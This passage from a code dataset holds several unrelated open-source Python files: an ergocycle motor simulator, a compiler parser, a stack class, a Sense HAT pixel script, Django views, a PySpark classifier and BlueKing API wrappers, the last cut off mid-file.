float = 0.0):\n \"\"\"\n Leads the motors to the indicated angle.\n\n Parameters\n ----------\n angle: float\n The angle the motor must go to ([-180.0, 360.0] deg)\n \"\"\"\n pass\n\n def cadence_control(\n self,\n cadence: float = 0.0,\n cadence_ramp_rate: float = 5,\n control_mode: ControlMode = ControlMode.CADENCE_CONTROL,\n ):\n \"\"\"\n Sets the motor to a given cadence in rpm of the pedals with velocities ramped at each change.\n\n Parameters\n ----------\n cadence: float\n Targeted cadence in rpm of the pedals.\n cadence_ramp_rate: float\n cadence ramp rate in rpm/s of the 
pedals.\n control_mode: ControlMode\n Control mode of the motor.\n \"\"\"\n cadence = abs(cadence)\n\n self._check_ramp_rate(cadence_ramp_rate)\n\n if self._control_mode not in control_modes_based_on_cadence:\n self.stopping()\n self.stopped()\n\n self._control_mode = control_mode\n\n return self.get_sign() * cadence\n\n def torque_control(\n self,\n user_torque: float = 0.0,\n torque_ramp_rate: float = 2.0,\n resisting_torque: float = None,\n control_mode: ControlMode = ControlMode.TORQUE_CONTROL,\n ):\n \"\"\"\n Set the odrive in torque control, choose the torque and start the motor.\n\n Parameters\n ----------\n user_torque: float\n Torque of the user (Nm) at the pedals.\n torque_ramp_rate: float\n Torque ramp rate (Nm/s) at the pedals.\n resisting_torque: float\n Resisting torque at the pedals (Nm).\n If the variable `torque` is absolute, set resisting_torque to 0.0.\n control_mode: ControlMode\n Control mode to use.\n\n Returns\n -------\n The input torque (Nm) at the pedals.\n \"\"\"\n # If the user is not pedaling yet or if he has stopped pedaling, the motor is stopped.\n vel_estimate = 0.0\n # `vel_estimate` is negative if pedaling forward, positive if pedaling backward.\n if (self._direction == DirectionMode.FORWARD and vel_estimate >= 0) or (\n self._direction == DirectionMode.REVERSE and vel_estimate <= 0\n ):\n input_motor_torque = motor_torque = 0.0\n torque_ramp_rate_motor = 100.0\n # If the user is pedaling, the torque and torque_ramp values have to be translated to the motor.\n else:\n # TODO: Check if the torque ramp rate is correct\n torque_ramp_rate_motor = torque_ramp_rate * self._reduction_ratio\n\n # The motor can be controlled with the computed values\n if self._control_mode not in control_modes_based_on_torque:\n self.stopping()\n self.stopped()\n\n # In case the previous control mode was based on torque control but was not `TORQUE_CONTROL`,\n # self._control_mode is updated.\n self._control_mode = control_mode\n\n return motor_torque # Nm at the pedals\n\n def concentric_power_control(\n self, power: float = 0.0, torque_ramp_rate: float = 2.0, resisting_torque: float = None\n ):\n \"\"\"\n # TODO add docstring in all to explain to call in a thread.\n Parameters\n ----------\n power: float\n Power (W) at the pedals.\n torque_ramp_rate: float\n Torque ramp rate (Nm/s) at the pedals.\n resisting_torque: float\n Resisting torque at the pedals (Nm).\n If the variable `torque` is absolute, set resisting_torque to 0.0.\n\n Returns\n -------\n The input torque (Nm) at the pedals.\n \"\"\"\n cadence = 0.0 # rad/s\n if cadence == 0:\n return self.torque_control(0.0, torque_ramp_rate, resisting_torque, ControlMode.CONCENTRIC_POWER_CONTROL)\n else:\n return self.torque_control(\n min(abs(power) / cadence, self.hardware_and_security[\"torque_lim\"]),\n torque_ramp_rate,\n resisting_torque,\n ControlMode.CONCENTRIC_POWER_CONTROL,\n )\n\n def eccentric_power_control(self, power: float = 0.0, cadence_ramp_rate: float = 5.0, cadence_max: float = 50.0):\n \"\"\"\n Parameters\n ----------\n power: float\n Power (W) at the pedals.\n cadence_ramp_rate: float\n cadence ramp rate (rpm/s) at the pedals.\n cadence_max: float\n Maximum cadence rpm at the pedals, if no torque is applied or if the torque < power / cadence_max.\n\n Returns\n -------\n The input torque (Nm) at the pedals.\n \"\"\"\n torque = self.get_user_torque()\n\n # If the user is not forcing against the motor, the motor goes to the maximum cadence.\n if (self._direction == DirectionMode.REVERSE and torque >= 0) or (\n 
self._direction == DirectionMode.FORWARD and torque <= 0\n ):\n self.cadence_control(cadence_max, cadence_ramp_rate, ControlMode.ECCENTRIC_POWER_CONTROL)\n return np.inf # So we know that the user is not forcing.\n else:\n cadence = min(abs(power / torque) / 2 / np.pi * 60, cadence_max)\n return self.cadence_control(cadence, cadence_ramp_rate, ControlMode.ECCENTRIC_POWER_CONTROL)\n\n def linear_control(self, linear_coeff: float = 0.0, torque_ramp_rate: float = 2.0, resisting_torque: float = None):\n \"\"\"\n Parameters\n ----------\n linear_coeff: float\n Linear coefficient (Nm/rpm) at the pedals.\n torque_ramp_rate: float\n Torque ramp rate (Nm/s) at the pedals.\n resisting_torque: float\n Resisting torque at the pedals (Nm).\n If the variable `torque` is absolute, set resisting_torque to 0.0.\n\n Returns\n -------\n The input torque (Nm) at the pedals.\n \"\"\"\n cadence = abs(self.get_cadence()) # rpm\n return self.torque_control(\n min(cadence * abs(linear_coeff), self.hardware_and_security[\"torque_lim\"]),\n torque_ramp_rate,\n resisting_torque,\n ControlMode.LINEAR_CONTROL,\n )\n\n def stopping(\n self,\n cadence_ramp_rate: float = 30,\n ):\n \"\"\"\n Starts the stopping sequence of the motor.\n\n Parameters\n ----------\n cadence_ramp_rate: float\n The ramp_rate of the deceleration (rpm/s of the pedals).\n \"\"\"\n self.previous_control_mode = copy.deepcopy(self._control_mode)\n\n self._check_ramp_rate(cadence_ramp_rate)\n\n self._control_mode = ControlMode.STOPPING\n\n def stopped(self):\n \"\"\"\n Running until the motor is fully stopped. Can be executed in another thread or process.\n\n Returns\n -------\n True when the motor has stopped.\n \"\"\"\n self._control_mode = ControlMode.STOP\n\n return True\n\n def stop(\n self,\n vel_stop: float = 10.0,\n cadence_ramp_rate: float = 30,\n ):\n \"\"\"\n Stops the motor gently.\n\n Parameters\n ----------\n vel_stop: float\n The cadence at which the motor will be stopped if it was turning (rpm of the pedals).\n cadence_ramp_rate: float\n The ramp_rate of the deceleration (rpm/s of the pedals).\n \"\"\"\n if vel_stop > self.hardware_and_security[\"maximal_cadence_stop\"]:\n raise ValueError(\n f\"The maximal cadence at which the motor can be stopped is \"\n f\"{self.hardware_and_security['maximal_cadence_stop']} rpm for the pedals.\"\n f\"Stop cadence specified: {abs(vel_stop)} rpm for the pedals\"\n )\n\n self.stopping(cadence_ramp_rate)\n\n while abs(self.get_cadence()) > vel_stop:\n pass\n\n self.stopped()\n\n def get_control_mode(self):\n \"\"\"\n Returns the current control mode.\n \"\"\"\n return self._control_mode\n\n def get_angle(self):\n \"\"\"\n Returns the estimated angle in degrees. 
A calibration is needed to know the 0.\n \"\"\"\n return self.compute_angle(self.get_turns())\n\n def get_turns(self):\n \"\"\"\n Returns the estimated number of turns.\n \"\"\"\n return 20 * np.sin(time.time() - self._relative_pos)\n\n def get_cadence(self) -> float:\n \"\"\"\n Returns the estimated cadence of the pedals in rpm.\n \"\"\"\n return self.compute_cadence(20 * np.sin(time.time()))\n\n def get_electrical_power(self):\n \"\"\"\n Returns the electrical power in W.\n \"\"\"\n return 20 * np.sin(time.time())\n\n def get_mechanical_power(self):\n \"\"\"\n Returns the mechanical power in W.\n \"\"\"\n return 20 * np.sin(time.time())\n\n def get_user_power(self):\n \"\"\"\n Returns the user mechanical power in W.\n \"\"\"\n return self.compute_user_torque(self.get_user_torque(), self.get_cadence())\n\n def get_iq_setpoint(self):\n \"\"\"\n Returns the commanded motor current in A.\n \"\"\"\n return 20 * np.sin(time.time())\n\n def get_iq_measured(self):\n \"\"\"\n Returns the measured motor current in A.\n \"\"\"\n return 20 * np.sin(time.time())\n\n def get_measured_torque(self):\n \"\"\"\n Returns the measured torque.\n \"\"\"\n return 20 * np.sin(time.time())\n\n def get_motor_torque(self):\n \"\"\"\n Returns the measured torque.\n \"\"\"\n return self.compute_motor_torque(20 * np.sin(time.time()))\n\n def get_resisting_torque(self):\n \"\"\"\n Returns the resisting torque.\n \"\"\"\n return self.compute_resisting_torque(\n 20 * np.sin(time.time()),\n 20 * np.sin(time.time()),\n )\n\n def get_user_torque(self):\n \"\"\"\n Returns the measured user torque (the resisting torque is subtracted from the motor_torque).\n \"\"\"\n return self.compute_user_torque(\n 20 * np.sin(time.time()),\n 20 * np.sin(time.time()),\n )\n\n def get_errors(self):\n \"\"\"\n Returns the errors.\n \"\"\"\n return \"\"\n\n def save_data_to_file(\n self,\n file_path: str,\n spin_box: float = None,\n instruction: float = None,\n ramp_instruction: float = None,\n comment: str = \"\",\n stopwatch: float = 0.0,\n lap: float = 0.0,\n ):\n \"\"\"\n Saves data.\n \"\"\"\n if self.first_save:\n self.t0 = time.time()\n self.first_save = False\n\n data = {\n \"comments\": comment,\n \"stopwatch\": stopwatch,\n \"lap\": lap,\n \"spin_box\": spin_box,\n \"instruction\": instruction,\n \"ramp_instruction\": ramp_instruction,\n \"time\": time.time() - self.t0,\n \"user_torque\": self.get_user_torque(),\n \"cadence\": self.get_cadence(),\n \"angle\": self.get_angle(),\n \"turns\": self.get_turns(),\n \"user_power\": self.get_user_power(),\n \"control_mode\": self._control_mode.value,\n \"direction\": self._direction.value,\n \"iq_setpoint\": self.get_iq_setpoint(),\n \"iq_measured\": self.get_iq_measured(),\n \"measured_torque\": self.get_measured_torque(),\n \"motor_torque\": self.get_motor_torque(),\n \"resisting_torque\": self.get_resisting_torque(),\n \"mechanical_power\": self.get_mechanical_power(),\n \"electrical_power\": self.get_electrical_power(),\n }\n\n save(data, file_path)\n\n def minimal_save_data_to_file(\n self,\n file_path: str,\n spin_box: float = None,\n instruction: float = None,\n ramp_instruction: float = None,\n comment: str = \"\",\n stopwatch: float = 0.0,\n lap: float = 0.0,\n training_mode: str = \"\",\n ):\n \"\"\"\n Saves data.\n \"\"\"\n if self.first_save:\n self.t0 = time.time()\n self.first_save = False\n\n data = {\n \"time\": time.time() - self.t0,\n \"spin_box\": spin_box,\n \"instruction\": instruction,\n \"ramp_instruction\": ramp_instruction,\n \"comments\": comment,\n \"stopwatch\": 
stopwatch,\n \"lap\": lap,\n \"control_mode\": self._control_mode.value,\n \"direction\": self._direction.value,\n \"training_mode\": training_mode,\n \"turns\": self.get_turns(),\n }\n\n save(data, file_path)\n","repo_name":"s2mLab/ControlOdrive","sub_path":"ergocycleS2M/motor_control/phantom.py","file_name":"phantom.py","file_ext":"py","file_size_in_byte":19741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44290359544","text":"from goto import *\nfrom action import *\nfrom funcoes_auxiliares_sintatico import *\nfrom recuperacao_de_erro import *\nfrom regras import Regras\nfrom scanner import Scanner\nfrom tabela_de_estados import TabelaDeEstados\nfrom tabela_de_simbolos import TabelaDeSimbolos\nfrom semantico import *\nfrom semantico import Semantico\nfrom funcoes_auxiliares_semantico import *\n\n\nclass Parser2:\n def __init__(self):\n self.pilha = [0]\n self.regras = Regras()\n self.scanner = Scanner(\"codigo.txt\")\n self.tabelaEstados = TabelaDeEstados()\n self.tabelaDeSimbolos = TabelaDeSimbolos()\n self.Semantico = Semantico('', '', 0)\n \n \n\n\n def buscarProximoToken(self, listaDeTokens): \n retornoScanner = self.scanner.SCANNER(self.tabelaEstados, self.tabelaDeSimbolos)\n if retornoScanner.classe != 'ERROR':\n listaDeTokens.append(retornoScanner)\n return 1\n else:\n retornoScanner = self.buscarProximoToken(listaDeTokens)\n return 0\n \n def PARSER(self):\n listaDeTokens = []\n mainAction()\n\n self.buscarProximoToken(listaDeTokens)\n index = 0\n token = listaDeTokens[index]\n\n a = token.classe.lower()\n \n while True:\n s = self.pilha[-1]\n acao = action(s,a)\n t = acao[1:]\n \n if('s' in acao):\n self.pilha.append(int(t))\n \n self.Semantico.pilha_semantica.append(token)\n \n val = self.buscarProximoToken(listaDeTokens)\n index += 1\n token = listaDeTokens[index]\n a = token.classe.lower()\n\n elif('R' in acao):\n\n A, B, regra = self.regras.retornaElementos(t)\n \n taux = t\n \n for element in B:\n desempilhar(self.pilha)\n \n\n \n t = self.pilha[-1]\n \n self.pilha.append(int(goto(int(t),A)))\n \n #print('Produção: ', regra)\n \n var_semantico = self.Semantico.ativa_semantico(taux, A, B, token, self.tabelaDeSimbolos)\n \n for i in range(len(B)):\n desempilhar(self.Semantico.pilha_semantica)\n \n self.Semantico.pilha_semantica.append(var_semantico)\n \n #print(f' ============== {self.Semantico.pilha_semantica}')\n \n elif('a' in acao):\n print('ACCEPT')\n print(self.tabelaDeSimbolos.imprimirTabela())\n #print(self.Semantico.programa_objeto)\n inicia_arquivo_objeto(self.Semantico.programa_objeto, self.Semantico.variaveis_temporarias)\n break\n \n else:\n sucessoPhraseRecovery = phraseRecovery(s, index, listaDeTokens, self.buscarProximoToken, self.scanner.linha2, self.scanner.coluna2)\n if(sucessoPhraseRecovery == False):\n index = panicMode(s, self.buscarProximoToken, listaDeTokens, index, self.scanner.linha, self.scanner.coluna)\n \n token = listaDeTokens[index]\n a = token.classe.lower()\n\n if (a == 'eof'):\n break","repo_name":"gilsonreisf/Compiladores","sub_path":"parser_2.py","file_name":"parser_2.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3981078080","text":"# stack ADT\n\n# Fixed Array implementation\n# struct stack{\n# int arr[];\n# int top;\n# int maxsize;\n# }\n\nclass Stack:\n def __init__(self, maxsize):\n self.maxsize = maxsize\n self.arr = [None for i in range(maxsize)]\n # keep track 
of the number of elements\n self.top = 0\n\n def peek(self):\n return self.arr[self.top - 1]\n\n def is_empty(self):\n return self.top == 0\n\n def push(self, x):\n # if the stack is full\n if self.top == self.maxsize:\n # handle overflow error\n print(\"The stack is full\")\n # if the stack is not full\n else:\n # add the element\n self.arr[self.top] = x\n self.top += 1\n\n def pop(self):\n # if the stack is empty\n if self.is_empty():\n # handle underflow error\n print(\"The stack is empty\")\n # if the stack is not empty\n else:\n # Last in First Out\n # return the popped value\n x = self.arr[self.top - 1]\n self.top -= 1\n return x\n\n def display(self):\n if self.is_empty():\n print(\"The stack is empty\")\n else:\n print(\"The elements in the stack are: \", end=\" \")\n for i in range(self.top):\n print(self.arr[i], end=\" \")\n print()\n","repo_name":"chriskokc/stack-ADT","sub_path":"array_stack.py","file_name":"array_stack.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18132059887","text":"\"\"\"\n==============================================\nARCADE CHARACTER GENERATOR\n==============================================\nCourse: Web Of Things (WOT)\nOption: New Media Development\nDepartment: Graphic and Digital Media\nCollege: Artevelde University College Ghent\n----------------------------------------------\nAuthors:\n - Brent De Roeck\n - Adriaan Glibert\n----------------------------------------------\nResources:\n - https://firebase.google.com/docs/admin/setup\n - https://pythonhosted.org/sense-hat/\n==============================================\n\"\"\"\n\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nfrom sense_hat import SenseHat\n\nsense = SenseHat()\nsense.clear()\n\ncred = credentials.Certificate('arcadegenerator-firebase-adminsdk-a1og2-e4d47303df.json')\ndefault_app = firebase_admin.initialize_app(cred,{\n 'databaseURL': 'https://arcadegenerator.firebaseio.com'\n })\n\n\nroot = db.reference()\n#getting the matrices table from the database\nmatrices = db.reference('/matrices').get()\npixelsInfo = matrices[\"matrix-01\"][\"pixels\"]\nsplitPixelsInfo = pixelsInfo.split('-')\n\nfor pixel in splitPixelsInfo:\n values = pixel.strip('[').strip(']').replace(\" \",\"\").split(\",\")\n sense.set_pixel(int(values[0]), int(values[1]), int(values[2]), int(values[3]), int(values[4])) \n\n","repo_name":"gdmgent-1718-wot/ArcadeCharacterGenerator","sub_path":"raspberry/arcade.py","file_name":"arcade.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72762505194","text":"from django.views.generic import TemplateView\nfrom django.shortcuts import get_object_or_404\nfrom django.utils.timezone import now\nfrom django.contrib.auth import get_user_model\n\nfrom med_social.decorators import member_required, login_required\n\nfrom .emails.views import RequestUpdateEmail\nfrom .models import UpdateRequest\nfrom .forms import BatchRequestUpdateForm\n\n\nclass RequestUpdateView(TemplateView):\n template_name = 'availability/partials/last_updated.html'\n\n def dispatch(self, *args, **kwargs):\n user_pk = self.kwargs['user_pk']\n if self.request.user.is_vendor:\n self.object =\\\n get_object_or_404(get_user_model(), id=user_pk,\n vendor=self.request.user.vendor)\n else:\n self.object = get_object_or_404(get_user_model(), id=user_pk)\n return 
super(RequestUpdateView, self).dispatch(*args, **kwargs)\n\n def get_context_data(self):\n ctx = super(RequestUpdateView, self).get_context_data()\n ctx.update({\n 'update_requested': True,\n 'for_user': self.object\n })\n return ctx\n\n def post(self, request, user_pk):\n avl_rq, created = UpdateRequest.objects.get_or_create(\n user=self.object)\n avl_rq.requested_by.add(self.request.user)\n avl_rq.save()\n RequestUpdateEmail(\n user=self.object,\n requested_by=request.user\n ).send()\n return self.render_to_response(self.get_context_data())\nrequest_update = member_required(RequestUpdateView.as_view())\n\n\nclass BatchRequestUpdateView(TemplateView):\n template_name = 'availability/partials/batch_update_request_form.html'\n\n def get_context_data(self, extra_context=None):\n extra_context = extra_context or {}\n ctx = super(BatchRequestUpdateView, self).get_context_data()\n ctx.update({\n 'success': True,\n })\n ctx.update(extra_context)\n return ctx\n\n def post(self, request):\n form = BatchRequestUpdateForm(data=request.POST)\n if form.is_valid():\n for user in form.cleaned_data['users']:\n avl_rq, created = UpdateRequest.objects.get_or_create(\n user=user)\n avl_rq.requested_by.add(self.request.user)\n avl_rq.save()\n RequestUpdateEmail(\n user=user,\n requested_by=request.user\n ).send()\n return self.render_to_response(\n self.get_context_data({'success': True}))\n else:\n return self.render_to_response(\n self.get_context_data({'success': False, 'form_error': True}))\nbatch_request_update = member_required(BatchRequestUpdateView.as_view())\n\n\nclass ConfirmAvailability(TemplateView):\n template_name = 'availability/confirm.html'\n confirmed = False\n\n def get(self, request):\n confirmed = request.GET.get('confirm', '').strip().lower()\n self.confirmed = confirmed == 'yes'\n if self.confirmed:\n request.user.last_updated_availability = now()\n request.user.save(update_fields=(('meta'),))\n return super(ConfirmAvailability, self).get(request)\n\n def get_context_data(self):\n ctx = super(ConfirmAvailability, self).get_context_data()\n ctx['availability'] = self.request.user.get_availability()\n ctx['object'] = self.request.user\n return ctx\nconfirm_availability = login_required(ConfirmAvailability.as_view())\n","repo_name":"ExpoPythonist/ProveBanking__s","sub_path":"apps/availability/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30041012594","text":"# -*- coding: utf-8 -*-\n# Autor: Fernando Roldán Zafra\n# Clasificación con spark\nfrom __future__ import print_function\nfrom pyspark import SparkContext, SparkConf, SQLContext\nfrom pyspark.sql.types import StructType, StructField, FloatType, IntegerType, StringType\nfrom pyspark.ml.feature import VectorAssembler, StandardScaler\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.feature import StringIndexer\nfrom pyspark.ml.tuning import ParamGridBuilder, TrainValidationSplit\nfrom pyspark.ml.evaluation import BinaryClassificationEvaluator\nfrom pyspark.ml.classification import LogisticRegression, RandomForestClassifier, LinearSVC\n\n#Creation of the spark context\ndef init_Context():\n\tconf = SparkConf().setAppName(\"Practica 4 - Fernando Roldan\")\n\tsc = SparkContext(conf=conf)\n\t#Do not show warnings on logs\n\tsc.setLogLevel('ERROR')\n\treturn sc\n\ndef read_csv(sc):\n\tsql = SQLContext(sc)\n\tdf = sql.read.csv(\"./filteredC.small.training\", header=True, inferSchema=True)\n\treturn 
df\n\ndef preprocess(df):\n\tdf = under_sampling(df)\n\tindexer = StringIndexer(inputCol=\"PredSS_central_1\", outputCol=\"PredSS_central_1_indexed\")\n\n\tassembler = VectorAssembler(inputCols=[\"PSSM_r1_1_N\", \"PredSS_central_1_indexed\", \"AA_freq_central_A\", \n\t\t\"AA_freq_global_H\", \"PSSM_r1_1_S\", \"PSSM_r2_-3_Y\"], outputCol='features')\n\t\n\tpipeline = Pipeline(stages=[indexer, assembler])\n\tdf_1 = pipeline.fit(df).transform(df).select('features', 'class')\n\t#df = assembler.transform(df).select('features', 'class')\n\t#df = df.select('features', 'labels')\n\tscale = StandardScaler(withMean=True, withStd=True, inputCol='features', outputCol='scaled_features')\n\tscale = scale.fit(df_1)\n\tdf_1 = scale.transform(df_1)\n\treturn df_1\n\n\ndef under_sampling(df):\n\tdf1 = df.filter(\"class=0\")\n\tdf2 = df.filter(\"class=1\")\n\tratio = float(df2.count())/float(df1.count())\n\tsample = df1.sample(withReplacement=False, fraction=ratio, seed=27)\n\tdf = sample.union(df2)\n\treturn df\n\n\ndef tuning(classifier, paramGrid, train):\n\ttvs = TrainValidationSplit(estimator=classifier,\n\t\t\t\t\t\t estimatorParamMaps=paramGrid,\n\t\t\t\t\t\t evaluator=BinaryClassificationEvaluator(),\n\t\t\t\t\t\t # 80% of the data will be used for training, 20% for validation.\n\t\t\t\t\t\t trainRatio=0.8)\n\n\t# Run TrainValidationSplit, and choose the best set of parameters.\n\tmodel = tvs.fit(train)\n\n\tParamMaps = model.getEstimatorParamMaps()\n\tfor i, params in enumerate(ParamMaps):\n\t\tprint(\"---------_\", str(i), \"_---------\", \" AUC: \", str(model.validationMetrics[i]))\n\t\tfor param, value in params.items():\n\t\t\tprint(param.name, \": \", str(value), \"; \", end='')\n\t\tprint(\"\\n\")\n\n\treturn model.bestModel\n\n\ndef validate(model, test):\n\t#model = estimator.fit(train)\n\teval = BinaryClassificationEvaluator()\n\tscore = eval.evaluate(model.transform(test))\n\treturn score\n\ndef train_logistic_regresion(train, test):\n\tlr = LogisticRegression(labelCol=\"class\", featuresCol=\"scaled_features\")\n\t\n\tparamGrid = ParamGridBuilder() \\\n\t.addGrid(lr.maxIter, [5, 10, 20]) \\\n\t.addGrid(lr.regParam, [0.1, 0.01]) \\\n\t.addGrid(lr.elasticNetParam, [0.5, 1]) \\\n\t.build()\n\n\tbest_model = tuning(lr, paramGrid, train)\n\tAUC = validate(best_model, test)\n\tprint(\"LogisticRegression best model AUC\", AUC)\n\tbest_model.write().overwrite().save(\"./logisticRegression_model\")\n\ndef train_random_forest(train, test):\n\trf = RandomForestClassifier(labelCol=\"class\", featuresCol=\"scaled_features\")\n\tparamGrid = ParamGridBuilder() \\\n\t.addGrid(rf.numTrees, [5, 10, 15]) \\\n\t.addGrid(rf.maxDepth, [3, 5, 8]) \\\n\t.build()\n\t\n\tbest_model = tuning(rf, paramGrid, train)\n\tAUC = validate(best_model, test)\n\tprint(\"Random forest best model AUC\", AUC)\n\tbest_model.write().overwrite().save(\"./random_forest_model\")\n\n\ndef train_linearSVC(train, test):\n\tsvc = LinearSVC(labelCol=\"class\", featuresCol=\"scaled_features\")\n\t\n\tparamGrid = ParamGridBuilder() \\\n\t.addGrid(svc.maxIter, [3, 5, 8]) \\\n\t.addGrid(svc.regParam, [0.1, 0.05, 0.15]) \\\n\t.build()\n\n\tbest_model = tuning(svc, paramGrid, train)\n\tAUC = validate(best_model, test)\n\tprint(\"Linear SVC best model AUC\", AUC)\n\tbest_model.write().overwrite().save(\"./svc_model\") \t\n\t\nif __name__==\"__main__\":\n\tsc = init_Context()\n\tdf = read_csv(sc)\n\tdf = preprocess(df)\n\tdf = df.selectExpr(\"scaled_features\",\"class as label\", \"class\")\n\ttrain, test = df.randomSplit([0.8, 0.2], seed=27) 
\n\n\tprint(\"Starting logistic Regression train...\")\n\ttrain_logistic_regresion(train, test)\n\t\n\t#print(\"Starting Random Forest train...\")\n\t#train_random_forest(train, test)\n\n\t#print(\"Starting linear SVC train...\")\n\t#train_linearSVC(train, test)\n\tsc.stop()\n","repo_name":"FernandoRoldan93/MII_Spark","sub_path":"src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74670522792","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('', views.say_hello),\n path('upload/', views.upload),\n path('labels/', views.labels),\n path('library/', views.get_all_videos),\n path('search/', views.search),\n path('recom/', views.recommendations),\n path('delete/', views.delete_videos),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"irusha/cs50fp","sub_path":"homehub/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41789345493","text":"# coding: utf-8\n# @Time: 2019/10/16 17:01\n# @Author: renpingsheng\n\nimport base64\n\nfrom blueking.component.shortcuts import get_client_by_request, get_client_by_user\n\n\n################### 蓝鲸登录平台 #######################\n\n# 获取所有用户信息\ndef bk_login_get_all_users(request):\n client = get_client_by_request(request)\n res = client.bk_login.get_all_users()\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 批量获取用户信息\ndef bk_login_get_batch_users(request, user_list):\n client = get_client_by_request(request)\n params = {\"bk_username_list\": user_list}\n res = client.bk_login.get_batch_users(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 获取用户信息\ndef bk_login_get_user(request):\n client = get_client_by_request(request)\n res = client.bk_login.get_user()\n if res.get('code') == 0:\n return res.get('data')\n\n\n################### 蓝鲸开发者中心 #######################\n\n# 获取应用信息\ndef bk_paas_get_app_info(request):\n client = get_client_by_request(request)\n res = client.bk_paas.get_app_info()\n if res.get('code') == 0:\n return res.get('data')\n\n\n################### 蓝鲸开发者平台 #######################\n\n# 发送邮件\ndef cmsi_send_mail(request):\n client = get_client_by_request(request)\n params = {\n 'bk_username': 'admin',\n \"receiver__username\": \"szgd_renpingsheng\",\n \"title\": \"This is a Test\",\n \"content\": \"Welcome to Blueking\",\n }\n res = client.cmsi.send_mail(**params)\n if res.get('result') == 0:\n return True\n return False\n\n\n# 发送邮件\ndef cmsi_send_sms(request):\n client = get_client_by_request(request)\n params = {\n 'bk_username': 'admin',\n \"receiver__username\": \"szgd_renpingsheng\",\n \"content\": \"Welcome to Blueking\",\n }\n res = client.cmsi.send_sms(**params)\n if res.get('result') == 0:\n return True\n return False\n\n\n################### 蓝鲸管控平台 #######################\n\n# 查询agent心跳详细信息。数据非实时,延时1分钟内。\ndef gse_get_agent_info(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"hosts\": [\n {\n \"ip\": \"192.168.148.103\",\n \"bk_cloud_id\": 0\n }\n ]\n }\n res = client.gse.get_agent_info(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 查询agent实时在线状态\ndef 
gse_get_agent_status(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"hosts\": [\n {\n \"ip\": \"192.168.148.114\",\n \"bk_cloud_id\": 0\n }\n ]\n }\n res = client.gse.get_agent_status(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n################### 蓝鲸作业平台 #######################\n\n# 获取所有作业\ndef job_get_job_list(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2, # 业务ID\n # \"name\": \"更新\", # 作业名称,模糊匹配\n # \"creator\": \"szgd_gavinlin\", # 作业创建人帐号\n # \"create_time_start\": \"2019-01-16\", # 创建起始时间,YYYY-MM-DD格式\n # \"create_time_end\": \"2019-01-16\", # 创建结束时间,YYYY-MM-DD格式\n # \"last_modify_user\": \"v_leehe\", # 作业修改人帐号\n # \"last_modify_time_start\": \"2019-01-17\", # 最后修改起始时间,YYYY-MM-DD格式\n # \"last_modify_time_end\": \"2019-01-17\", # 最后修改结束时间,YYYY-MM-DD格式\n # \"tag_id\": \"1\", # 作业标签ID,1.未分类、2.运营发布、3.故障处理、4.常用工具、5.产品自助、6.测试专用、7.持续集成\n # \"start\": \"1\", # 默认0表示从第1条记录开始返回\n # \"length\": \"1\", # 返回记录数量,不传此参数默认返回全部\n }\n res = client.job.get_job_list(**params)\n\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 根据作业模板ID查询作业模板详情,测试OK\ndef job_get_job_detail(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n \"bk_job_id\": 1135, # 通过 job_get_job_list 接口查询\n }\n res = client.job.get_job_detail(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 根据作业模板ID查询作业模板详情,测试OK\ndef job_get_cron_list(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n # \"cron_name\": \"cron_name\", # 定时作业名称\n # \"cron_id\": \"cron_name\", # 定时任务ID,如果存在则忽略其他筛选条件,只查询这个指定的作业信息\n # \"cron_status\": \"cron_name\", # 定时作业状态:1.已启动、2.已暂停\n # \"creator\": \"cron_name\", # 定时作业创建人帐号\n # \"create_time_start\": \"cron_name\", # 创建起始时间,YYYY-MM-DD格式\n # \"create_time_end\": \"cron_name\", # 创建结束时间,YYYY-MM-DD格式\n # \"last_modify_user\": \"cron_name\", # 作业修改人帐号\n # \"last_modify_time_start\": \"cron_name\", # 最后修改起始时间,YYYY-MM-DD格式\n # \"last_modify_time_end\": \"cron_name\", # 最后修改结束时间,YYYY-MM-DD格式\n # \"start\": \"cron_name\", # 默认0表示从第1条记录开始返回\n # \"length\": \"cron_name\", # 返回记录数量,不传此参数默认返回全部\n }\n res = client.job.get_cron_list(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 快速分发文件,测试OK\ndef job_fast_push_file(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2, # 业务ID\n \"account\": \"root\", # 执行帐号名/别名\n \"file_target_path\": \"/tmp\", # 分发文件的目标路径\n \"file_source\": [\n {\n \"files\": [\n 